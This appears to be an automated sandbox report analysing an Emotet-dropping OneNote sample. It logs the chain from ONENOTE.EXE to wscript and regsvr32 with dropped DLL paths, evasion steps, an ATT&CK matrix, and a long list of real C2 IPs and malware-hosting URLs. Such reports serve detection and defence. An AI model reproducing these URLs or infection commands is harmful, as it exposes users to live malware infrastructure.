                Source: C:\Windows\SysWOW64\wscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\OMICS.one
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll
                Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll"
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dllJump to behavior
                Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll"Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\Documents\{5F028F94-197F-4191-9736-A96A0CA2E032}Jump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{784AD066-55F5-487F-9E39-1E5302D19FF7} - OProcSessId.datJump to behavior
                Source: classification engineClassification label: mal100.troj.expl.evad.winONE@9/11@1/49
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E08BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,3_2_00E08BC8
                Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
                Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
                Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
                Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C69 push rdi; ret 3_2_0000000180005C72
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800056DD push rdi; ret 3_2_00000001800056E4
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0A0FC push ebp; iretd 3_2_00E0A0FD
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E180D7 push ebp; retf 3_2_00E180D8
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E06CDE push esi; iretd 3_2_00E06CDF
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E06C9F pushad ; ret 3_2_00E06CAA
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0A1D2 push ebp; iretd 3_2_00E0A1D3
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17987 push ebp; iretd 3_2_00E1798F
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17D4E push ebp; iretd 3_2_00E17D4F
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E09D51 push ebp; retf 3_2_00E09D5A
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E18157 push ebp; retf 3_2_00E18158
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17D25 push 4D8BFFFFh; retf 3_2_00E17D2A
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17D3C push ebp; retf 3_2_00E17D3D
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E17EAF push 458BCC5Ah; retf 3_2_00E17EBC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E09E8B push eax; retf 3_2_00E09E8E
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E0A26E push ebp; ret 3_2_00E0A26F
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00E1C731 push esi; iretd 3_2_00E1C732
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E06CDE push esi; iretd 4_2_00E06CDF
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E06C9F pushad ; ret 4_2_00E06CAA
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E26D34 push edi; ret 4_2_00E26D36
                Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00E1C731 push esi; iretd 4_2_00E1C732
                Source: radC86B9.tmp.dll.1.drStatic PE information: section name: _RDATA
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll
                Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dllJump to dropped file
                Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\VZzVLyswcgycmo\hwmNzoGEns.dll (copy)Jump to dropped file
                Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\VZzVLyswcgycmo\hwmNzoGEns.dll (copy)Jump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\VZzVLyswcgycmo\hwmNzoGEns.dll:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exe TID: 5960Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\regsvr32.exe TID: 6088Thread sleep time: -270000s >= -30000sJump to behavior
                Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.0 %
                Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008D28 FindFirstFileExW,3_2_0000000180008D28
                Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400870952.0000000005251000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005238000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404609462.0000000005253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW 5)
                Source: wscript.exe, 00000001.00000003.400714303.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402484207.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005290000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404747809.0000000005290000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.504134282.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632757041.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.532494710.0000000000F11000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480984272.0000000000F11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: regsvr32.exe, 00000004.00000002.632757041.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.480385040.0000000000ECD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@q
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000000180001C48
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A878 GetProcessHeap,3_2_000000018000A878
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,3_2_0000000180010C10
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0000000180001C48
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00000001800082EC
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00000001800017DC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
                Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dllJump to behavior
                Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800070A0 cpuid 3_2_00000001800070A0
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_0000000180001D98

                Stealing of Sensitive Information

                barindex
                Yara detected Malicious OneNote
                Source: Yara matchFile source: OMICS.one, type: SAMPLE
                Yara detected Emotet
                Source: Yara matchFile source: 4.2.regsvr32.exe.bc0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.regsvr32.exe.bc0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.dd0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.regsvr32.exe.dd0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.632533152.0000000000BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.632618428.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.385096906.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.385011052.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected Malicious OneNote
                Source: Yara matchFile source: OMICS.one, type: SAMPLE

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts1
                Scripting                		1
                DLL Side-Loading                		111
                Process Injection                		21
                Masquerading                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		Exfiltration Over Other Network Medium11
                Encrypted Channel                		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Virtualization/Sandbox Evasion                		LSASS Memory121
                Security Software Discovery                		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                Non-Standard Port                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                Process Injection                		Security Account Manager1
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                Ingress Tool Transfer                		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Scripting                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput CaptureScheduled Transfer3
                Non-Application Layer Protocol                		SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Hidden Files and Directories                		LSA Secrets1
                Remote System Discovery                		SSHKeyloggingData Transfer Size Limits114
                Application Layer Protocol                		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Obfuscated Files or Information                		Cached Domain Credentials2
                File and Directory Discovery                		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Regsvr32                		DCSync25
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 828486 Sample: OMICS.one Startdate: 17/03/2023 Architecture: WINDOWS Score: 100 33 129.232.188.93 xneeloZA South Africa 2->33 35 45.235.8.30 WIKINETTELECOMUNICACOESBR Brazil 2->35 37 36 other IPs or domains 2->37 47 Snort IDS alert for network traffic 2->47 49 Multi AV Scanner detection for domain / URL 2->49 51 Antivirus detection for URL or domain 2->51 53 7 other signatures 2->53 10 ONENOTE.EXE 21 23 2->10         started        signatures3 process4 process5 12 wscript.exe 2 10->12         started        dnsIp6 45 penshorn.org 203.26.41.131, 443, 49685 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 12->45 29 C:\Users\user\AppData\...\radC86B9.tmp.dll, PE32+ 12->29 dropped 31 C:\Users\user\AppData\Local\Temp\click.wsf, ASCII 12->31 dropped 59 System process connects to network (likely due to code injection or exploit) 12->59 17 regsvr32.exe 12->17         started        file7 signatures8 process9 process10 19 regsvr32.exe 2 17->19         started        file11 27 C:\Windows\System32\...\hwmNzoGEns.dll (copy), PE32+ 19->27 dropped 55 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->55 23 regsvr32.exe 19->23         started        signatures12 process13 dnsIp14 39 160.16.142.56, 8080 SAKURA-BSAKURAInternetIncJP Japan 23->39 41 91.121.146.47, 49686, 8080 OVHFR France 23->41 43 8 other IPs or domains 23->43 57 System process connects to network (likely due to code injection or exploit) 23->57 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                OMICS.one31%ReversingLabsScript-WScript.Trojan.OneNote
                OMICS.one41%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\radC86B9.tmp.dll58%ReversingLabsWin64.Trojan.Emotet
                C:\Windows\System32\VZzVLyswcgycmo\hwmNzoGEns.dll (copy)58%ReversingLabsWin64.Trojan.Emotet

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                3.2.regsvr32.exe.dd0000.0.unpack100%AviraHEUR/AGEN.1215476Download File
                4.2.regsvr32.exe.bc0000.0.unpack100%AviraHEUR/AGEN.1215476Download File

                Domains

                SourceDetectionScannerLabelLink
                penshorn.org11%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                https://penshorn.org/v0%Avira URL Cloudsafe
                https://159.89.202.34:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://182.162.143.56/0%URL Reputationsafe
                http://softwareulike.com/cWIYxWMPkK/16%VirustotalBrowse
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://104.168.155.143:8080/l100%Avira URL Cloudmalware
                https://159.89.202.34/100%Avira URL Cloudmalware
                http://softwareulike.com/cWIYxWMPkK/100%Avira URL Cloudmalware
                https://164.90.222.65/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/;0%Avira URL Cloudsafe
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/11100%Avira URL Cloudmalware
                https://169.89.202.34/0%Avira URL Cloudsafe
                https://163.44.196.120:8080/100%Avira URL Cloudmalware
                https://66.228.32.31:7080/Q100%Avira URL Cloudmalware
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/100%Avira URL Cloudmalware
                https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://187.172.199.165:8080/0%Avira URL Cloudsafe
                https://www.gomespontes.com.br/logs/pd/vM100%Avira URL Cloudmalware
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/Z=100%Avira URL Cloudmalware
                https://91.121.146.47:8080/100%Avira URL Cloudmalware
                https://www.gomespontes.com.br/logs/pd/0100%Avira URL Cloudmalware
                https://160.16.142.56:8080/u0%Avira URL Cloudsafe
                https://167.172.199.165:8080/100%Avira URL Cloudmalware
                https://159.89.202.34/q100%Avira URL Cloudmalware
                http://ozmeydan.com/cekici/9/100%Avira URL Cloudmalware
                https://penshorn.org/0%Avira URL Cloudsafe
                https://penshorn.org/admin/Ses8712iGR8du/tM100%Avira URL Cloudmalware
                https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM100%Avira URL Cloudmalware
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/0%Avira URL Cloudsafe
                https://66.228.32.31:7080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/X&100%Avira URL Cloudmalware
                https://www.gomespontes.com.br/logs/pd/100%Avira URL Cloudmalware
                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0100%Avira URL Cloudmalware
                https://penshorn.org/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM100%Avira URL Cloudmalware
                https://104.168.155.143:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://164.90.222.65:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/?100%Avira URL Cloudmalware
                https://187.63.160.88:80/100%Avira URL Cloudmalware
                http://softwareulike.com/cWIYxWMPkK/yM100%Avira URL Cloudmalware
                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/100%Avira URL Cloudmalware
                https://163.44.196.120:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://penshorn.org/admin/Ses8712iGR8du/R100%Avira URL Cloudmalware
                https://912.162.143.56/0%Avira URL Cloudsafe
                https://penshorn.org/admin/Ses8712iGR8du/cw3100%Avira URL Cloudmalware
                https://104.168.155.143:8080/(SI100%Avira URL Cloudmalware
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6H100%Avira URL Cloudmalware
                http://ozmeydan.com/cekici/9/xM100%Avira URL Cloudmalware
                https://167.172.199.165:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware
                https://91.121.146.47:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/0100%Avira URL Cloudmalware
                https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/100%Avira URL Cloudmalware
                https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllB100%Avira URL Cloudmalware
                https://160.16.142.56:8080/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/b0%Avira URL Cloudsafe
                http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM100%Avira URL Cloudmalware
                https://159.89.202.34/wn100%Avira URL Cloudmalware
                https://penshorn.org:443/admin/Ses8712iGR8du/100%Avira URL Cloudmalware
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/D=100%Avira URL Cloudmalware
                https://160.16.142.56:8080/0%Avira URL Cloudsafe
                https://164.90.222.65/0100%Avira URL Cloudmalware
                https://187.63.160.88:80/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                penshorn.org
                		203.26.41.131
                		truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://182.162.143.56/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/true
                • Avira URL Cloud: malware
                		unknown
                https://penshorn.org/admin/Ses8712iGR8du/true
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://159.89.202.34:443/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/regsvr32.exe, 00000004.00000002.633026699.000000000307F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://penshorn.org/vwscript.exe, 00000001.00000003.400442984.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.388435082.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402255447.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.404632194.0000000005266000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399676570.0000000005266000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000001.00000003.400975986.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393015546.0000000004E75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391243728.0000000004D4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400442984.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393338930.0000000004F2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.389673228.0000000004FEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394911230.0000000004EFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395679692.0000000005098000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391578273.0000000004DE1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397422958.0000000005117000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393251132.0000000004EEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393397688.0000000004EAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402722979.00000000050D0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394406630.0000000005020000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402919914.00000000050A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.391819816.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390466221.0000000004D07000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394296521.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.390572551.0000000004D33000.00000004.00000020.00020000.00000000.sdmptrue
                • 16%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                https://104.168.155.143:8080/lregsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://159.89.202.34/regsvr32.exe, 00000004.00000002.632856837.0000000000F1F000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                https://182.162.143.56/regsvr32.exe, 00000004.00000003.504544238.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://159.89.202.34/ckzqrt/qwaeakozjqvcl/egbttboilpzwomtm/enhiytgvr/11regsvr32.exe, 00000004.00000002.632856837.0000000000F73000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
